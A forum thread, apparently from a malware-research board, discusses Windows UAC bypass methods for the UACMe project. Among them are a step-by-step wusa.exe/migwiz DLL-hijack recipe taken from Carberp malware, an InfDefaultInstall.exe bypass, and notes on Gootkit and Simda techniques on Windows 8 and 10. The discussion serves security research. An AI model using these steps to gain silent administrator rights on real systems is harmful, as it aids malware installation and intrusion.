[ebfe]

There is another UAC bypass method used in Carberp malware: https://github.com/hzeroo/Carberp/blob/ ... bypass.cpp

Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe

This method is also mentioned here: https://www.syscan360.org/slides/2013_E ... truder.pdf

[EP_X0FF]

Yes, I'm aware of it and skipped because Carberp open-source.

Have you tried it with recent Windows? Is it still working on 8/8.1/10? If so I may consider adding it too, after remake because Carberp source is trash.

[ebfe]

The wusa.exe method works flawlessly on windows 8/8.1, however I didn't check it on Win10.

[rinn]

@EP_X0FF

You should definitely try this method :) Along with looking on APPINFO.DLL whitelist.

[R00tKit]

infDefault.exe Bypass UAC

when UAC is on
with InfDefaultInstall.exe we can install any service in Reg and copy file to privileged path without any alert & UAC prompt

i shared this method with @EP_X0FF in PM and it works in 7,8 but cant check 10

[EP_X0FF]

The problem with Carberp method is that they use "ehome" directory and mcx2prov.exe as target which present only in old windows installs with media center components. However as stated above we can use migwiz which is very well designed for this method. It has "HighestAvailable" access defined in manifest, sits in standalone directory "migwiz", loads dlls from system32 and has no embedded manifest dlls redirection, which makes it vulnerable to dll hijacking. However it is absent in Windows 10 TP 10041, unsure if it was redesigned or just removed from Preview builds, it still present in APPINFO whitelist however.

edit: I've updated UACMe to include tweaked Carberp method mentioned by ebfe.

[kmd]

have you figured out why gootkit method doesnt work on win10?

[EP_X0FF]

have you figured out why gootkit method doesnt work on win10?

MS removed autoElevate from sdbinst.exe. You can try make a hybrid from Simda + Gootkit method, bypass HLKM AppCompat key security, write sdb settings manually, but I doubt it will work because NtApphelpCacheControl require caller to be Admin or System.

P.S.
Additionally starting from builds > 9901 they moved shcore.dll to KnownDlls. However Windows 10 even 10049 is still contain multiple other unfixed UAC auto-elevation exploits.

[Alex]

Don't forget about yet another MS's gift (I didn't test it on win 8+) - http://codetastrophe.com/Larimer-VB2011.pdf This method is even easier to exploit than the first Davidson's PoC. Does anyone know malwere using it to bypass UAC?

[EP_X0FF]

Thanks for mention it.

This paragraphs greatly disavows quality of this article.

Davidson’s proof-of-concept attack still works
as of May 2011, almost two years after it was published, but
we haven’t seen any malware that takes advantage of that
specifi c attack vector to increase privileges on a system.

Actually there were a lot of them, even in 2010. This means author of this were unable to investigate subject area before writting anything.

Next, printui.exe is level requireAdministrator. You can't even launch help /? command without triggering UAC.

Text is about 80% water, 1 useful screenshot and nothing more.